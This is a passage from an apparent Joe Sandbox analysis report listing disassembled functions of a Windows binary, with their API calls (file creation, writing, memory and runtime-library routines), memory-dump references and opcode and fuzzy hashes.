                                                                                      • String ID: InitializeCriticalSectionEx$d0F
                                                                                      • API String ID: 2593887523-4269990031
                                                                                      • Opcode ID: 95325a6fe092377222a09dc8cac61673c46969df07ef5e0a622650f36e39cb0b
                                                                                      • Instruction ID: f24ac0a78b30228f137b750928060b9cce3a084674751647f83a18ac7995c117
                                                                                      • Opcode Fuzzy Hash: 95325a6fe092377222a09dc8cac61673c46969df07ef5e0a622650f36e39cb0b
                                                                                      • Instruction Fuzzy Hash: 21F0B475A45318BBCF016F54DC06DAE7F62DF45711F504114FC1596260DA718E109BF4
                                                                                      Function 00D9784C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: FlsAlloc$d0F
                                                                                      • API String ID: 2773662609-3126023658
                                                                                      • Opcode ID: 76d4213f7baea12c23c1c17d843ed45564f06f2e416f433f7a9b517be0ba863b
                                                                                      • Instruction ID: ec1dc600063b334247275ce0a0d71cae36ff15390336313776e665c31b5b62ee
                                                                                      • Opcode Fuzzy Hash: 76d4213f7baea12c23c1c17d843ed45564f06f2e416f433f7a9b517be0ba863b
                                                                                      • Instruction Fuzzy Hash: 2BE0E575B453187B8714AF649C0A9AEBF95DB46720F500164FC05A6380DE715E0586F9
                                                                                      Function 00D79BC8 Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,?,00D7C853,00000001,?,?,?,00000000,00D8420B,?,?,?,?,?,00D83CB0), ref: 00D79BE3
                                                                                      • WriteFile.KERNEL32(?,00000000,?,00D83EB8,00000000,?,?,00000000,00D8420B,?,?,?,?,?,00D83CB0,?), ref: 00D79C23
                                                                                      • WriteFile.KERNELBASE(?,00000000,?,00D83EB8,00000000,?,00000001,?,?,00D7C853,00000001,?,?,?,00000000,00D8420B), ref: 00D79C50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$Handle
                                                                                      • String ID:
                                                                                      • API String ID: 4209713984-0
                                                                                      • Opcode ID: 167855d870e314d4596875dddd4439b027b12db2799e25030cab1b537db8e4ea
                                                                                      • Instruction ID: 63a2de3505e422ee91ce49fb1036eca19b42759463e2b041e08015730f986b31
                                                                                      • Opcode Fuzzy Hash: 167855d870e314d4596875dddd4439b027b12db2799e25030cab1b537db8e4ea
                                                                                      • Instruction Fuzzy Hash: 20313372108605AFDF218E14D858BA6FBE8EB91710F08C11AF598932D0E775E849CBB2
                                                                                      Function 00D79E86 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EAD
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EE0
                                                                                      • GetLastError.KERNEL32(?,?,?,?,00D79D92,?,00000001,00000000,?,?), ref: 00D79EFD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2485089472-0
                                                                                      • Opcode ID: ac4a3ac9c52a83ab267446e6bc3ce1086c192269f841f506058da82f524d997e
                                                                                      • Instruction ID: 72fcdc5b5de1f976d4fc4f0c167c80a2dd9617b782759c090915b38611e01b59
                                                                                      • Opcode Fuzzy Hash: ac4a3ac9c52a83ab267446e6bc3ce1086c192269f841f506058da82f524d997e
                                                                                      • Instruction Fuzzy Hash: F701DE33111218A6DB21EA684C56FEFF75DDF06341F0C8412F84DD2085FB20898197F6
                                                                                      Function 00D7C413 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 11f21922c506a3bd444a14323884bbdcd9cbbfe03ab16efc131558b0915efec1
                                                                                      • Instruction ID: c6f7eb86938db7a8a9adeb3855533a23f2413984a4358a47994adacffb7031ed
                                                                                      • Opcode Fuzzy Hash: 11f21922c506a3bd444a14323884bbdcd9cbbfe03ab16efc131558b0915efec1
                                                                                      • Instruction Fuzzy Hash: 6A119170A11244DEDB14EBB895057AEBAE8EF84304F14446EE44DD7342EBB45E00C772
                                                                                      Function 00D73AA3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: 87c39df36f3403231e52b91c2e8d7f6f84d451ede32f49f6d56ebc0aa5242322
                                                                                      • Instruction ID: 6c085fc13a10e1a29c26dfdf31cdc013eee65d735dd1d925bfbb35c08e68d045
                                                                                      • Opcode Fuzzy Hash: 87c39df36f3403231e52b91c2e8d7f6f84d451ede32f49f6d56ebc0aa5242322
                                                                                      • Instruction Fuzzy Hash: 9A619F71504F44AADB21DB74CC519EBB7E8EF14301F44896EE19E87142E732AA48DF31
                                                                                      Function 00D71DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71DA6
                                                                                        • Part of subcall function 00D73AA3: __EH_prolog.LIBCMT ref: 00D73AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: acd1afb52f31c0292357843683c74abbc46b06011aa8cf5bbc2e70d5368dc4ed
                                                                                      • Instruction ID: 7c2499b6917fe890fc3e3a9420af726aa38e39de6e08b3d3c1e3b5a10a857547
                                                                                      • Opcode Fuzzy Hash: acd1afb52f31c0292357843683c74abbc46b06011aa8cf5bbc2e70d5368dc4ed
                                                                                      • Instruction Fuzzy Hash: D32139369002099FCF15EF98C9419EEFBF5EF48300B104169F849A3251DB325A14DB70
                                                                                      Function 00D718FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3519838083-2756464174
                                                                                      • Opcode ID: e3c3bf9b79ed31c382a857c2016be43ded34ba2af2354b1a8ca09f4191ed15b9
                                                                                      • Instruction ID: 7fdbcf3bb1fa78d69263da204c47dd3fdb4ace3820d451727fcc963a2700d75f
                                                                                      • Opcode Fuzzy Hash: e3c3bf9b79ed31c382a857c2016be43ded34ba2af2354b1a8ca09f4191ed15b9
                                                                                      • Instruction Fuzzy Hash: 6F11B474A00201AFDB04DF69C495ABEF7BAFF85300F08825AE55997241EB309956DF70
                                                                                      Function 00D91D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • try_get_function.LIBVCRUNTIME ref: 00D91DAF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: try_get_function
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2742660187-671089009
                                                                                      • Opcode ID: f0df6a57a8ccd3fb710be2357a296b9241590e9875e83174bfd434b54a99c260
                                                                                      • Instruction ID: d75f1b922492b2d18f9240f4160bd239926fb120aee82909ac06fe1aa4009927
                                                                                      • Opcode Fuzzy Hash: f0df6a57a8ccd3fb710be2357a296b9241590e9875e83174bfd434b54a99c260
                                                                                      • Instruction Fuzzy Hash: 63D05B2EF823256E9B1036D5AC029DABF54CB01BF1F040451FF0C65282D591445556F1
                                                                                      Function 00D8CD5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8CD6E
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID: 3Ro
                                                                                      • API String ID: 1269201914-1492261280
                                                                                      • Opcode ID: c16e7c5f638bee312da0d90fa025165c50bcd3182fa95d5d33f957a80811efb9
                                                                                      • Instruction ID: 76460df41a23708e32a45c0f941ed72d245c96d9fcf4ece4e67e482a571c6623
                                                                                      • Opcode Fuzzy Hash: c16e7c5f638bee312da0d90fa025165c50bcd3182fa95d5d33f957a80811efb9
                                                                                      • Instruction Fuzzy Hash: 9EB012C1279001FD3128B3089E02C37010CC0C2F50330556FF842D4190A8644C06D132
                                                                                      Function 00D71383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71383
                                                                                        • Part of subcall function 00D75FB1: __EH_prolog.LIBCMT ref: 00D75FB6
                                                                                        • Part of subcall function 00D7C413: __EH_prolog.LIBCMT ref: 00D7C418
                                                                                        • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C45B
                                                                                        • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C47F
                                                                                      • new.LIBCMT ref: 00D713FB
                                                                                        • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 7ab43ab52c29aee32465520c8c3c4b109d3419fb472948830b6b90e46be33b33
                                                                                      • Instruction ID: 82198c9f342bb8159d7a08466cfb681697380b29db2bb7bd6d6fbd296c357382
                                                                                      • Opcode Fuzzy Hash: 7ab43ab52c29aee32465520c8c3c4b109d3419fb472948830b6b90e46be33b33
                                                                                      • Instruction Fuzzy Hash: 3C4147B0805B40DED724DF798485AE6FBE5FF28300F508A2ED5EE87282DB326554CB25
                                                                                      Function 00D7137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D71383
                                                                                        • Part of subcall function 00D75FB1: __EH_prolog.LIBCMT ref: 00D75FB6
                                                                                        • Part of subcall function 00D7C413: __EH_prolog.LIBCMT ref: 00D7C418
                                                                                        • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C45B
                                                                                        • Part of subcall function 00D7C413: new.LIBCMT ref: 00D7C47F
                                                                                      • new.LIBCMT ref: 00D713FB
                                                                                        • Part of subcall function 00D7AC66: __EH_prolog.LIBCMT ref: 00D7AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: d499ac369bfd7e679be2b7f0a8fccd22ddb7d1adbc24d37c40b26acbe36a2750
                                                                                      • Instruction ID: 1d3cdd64fbfbafd38c02f6c1350db9fd275e32ac3097dbbd6e6876dfc362922d
                                                                                      • Opcode Fuzzy Hash: d499ac369bfd7e679be2b7f0a8fccd22ddb7d1adbc24d37c40b26acbe36a2750
                                                                                      • Instruction Fuzzy Hash: BF4137B0805B40DED725DF798485AE6FBE5FF28300F508A2ED5EE83282DB726554CB25
                                                                                      Function 00D98457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D9631F: GetLastError.KERNEL32(?,00DACBE8,00D92674,00DACBE8,?,?,00D92213,?,?,00DACBE8), ref: 00D96323
                                                                                        • Part of subcall function 00D9631F: _free.LIBCMT ref: 00D96356
                                                                                        • Part of subcall function 00D9631F: SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96397
                                                                                        • Part of subcall function 00D9631F: _abort.LIBCMT ref: 00D9639D
                                                                                        • Part of subcall function 00D98576: _abort.LIBCMT ref: 00D985A8
                                                                                        • Part of subcall function 00D98576: _free.LIBCMT ref: 00D985DC
                                                                                        • Part of subcall function 00D981EB: GetOEMCP.KERNEL32(00000000,?,?,00D98474,?), ref: 00D98216
                                                                                      • _free.LIBCMT ref: 00D984CF
                                                                                      • _free.LIBCMT ref: 00D98505
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorLast_abort
                                                                                      • String ID:
                                                                                      • API String ID: 2991157371-0
                                                                                      • Opcode ID: 55a95d8d6b3a622ae0681c2ebf6b97edaceba1fdb73fa1f6521f582d08c21361
                                                                                      • Instruction ID: 5e2c551f55ef49f4c1ae63bfbaac3ffc61a0c88ea1cb4360378cad9453db8627
                                                                                      • Opcode Fuzzy Hash: 55a95d8d6b3a622ae0681c2ebf6b97edaceba1fdb73fa1f6521f582d08c21361
                                                                                      • Instruction Fuzzy Hash: 93318231904209AFDF11EFA9D441A9D77E5EF42720F2941A9F8089B292DF369E41EB70
                                                                                      Function 00D794F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D79B87,?,?,00D77735), ref: 00D79579
                                                                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D79B87,?,?,00D77735), ref: 00D795AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: ba69dd878880859739a3bc5b477bee0547f29039030e379503c53a1e013dc02b
                                                                                      • Instruction ID: 9dc7291e0780f038ccc38023fca62bc9d4cc480499f575c8f7afcbf2c6aa569e
                                                                                      • Opcode Fuzzy Hash: ba69dd878880859739a3bc5b477bee0547f29039030e379503c53a1e013dc02b
                                                                                      • Instruction Fuzzy Hash: AF21E4B2004748AFD7318F14C845BA7BBE8EB49764F04892DF5E982191E274AD499B71
                                                                                      Function 00D79A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00D77436,?,?,?), ref: 00D79A2C
